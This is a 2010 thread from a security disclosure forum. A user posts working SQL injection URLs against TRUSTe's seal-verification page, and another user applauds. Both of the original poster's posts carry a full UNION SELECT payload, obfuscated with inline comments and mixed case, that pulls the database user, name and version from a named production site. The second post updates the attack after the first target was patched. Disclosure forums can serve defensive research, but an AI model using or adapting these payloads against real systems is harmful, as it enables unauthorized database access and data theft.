Truste(dot)com SQli "The Leader in Advancing Online Confidence"

sla.ckers.org is
ha.ckers sla.cking

Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

Truste(dot)com SQli "The Leader in Advancing Online Confidence"

Posted by: VMw4r3

Date: July 19, 2010 02:23PM

Quote from site:
"The Leader in Advancing Online Confidence

Leading brands rely on TRUSTe privacy services to increase the confidence of their site visitors and realize improved leads, conversions and sign-ups."

http://www.truste.com/privacy_seals_and_services/index.html

hxxp://clicktoverify.truste.com/pvr.php?page=validate&url=www.facebook.com&sealid=102/*VMw4r3*/aNd/**/99/**/LiKe/**/98/**/UnIOn/**/SeLeCt/**/1,2,concat_ws(0x3a,user(),database(),@@version),4,5,6,7,8,9,10,11--

Image:
http://img843.imageshack.us/img843/3493/validationpageforonline.png

Edited 2 time(s). Last edit at 07/19/2010 07:05PM by VMw4r3.

Options: Reply•Quote

Re: Truste(dot)com SQli "The Leader in Advancing Online Confidence"

Posted by: m1cr0n

Date: July 23, 2010 09:04AM

;)
Very good!
"The Leader in Advancing Online Confidence"

Make me smile.

Options: Reply•Quote

Re: Truste(dot)com SQli "The Leader in Advancing Online Confidence"

Posted by: VMw4r3

Date: July 23, 2010 12:22PM

lol Click With Confidence

/*update*/

The facebook url above is not vulnerable any more, but site is still vulnerable.

hxxp://clicktoverify.truste.com/pvr.php?page=validate&url=www.free-tax-return.com&sealid=101/*VMw4r3*/aNd/**/99/**/LiKe/**/98/**/UnIOn/**/SeLeCt/**/1,2,concat_ws(0x3a,user(),database(),@@version),4,5,6,7,8,9,10,11--

Edited 2 time(s). Last edit at 08/23/2010 02:43PM by VMw4r3.

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login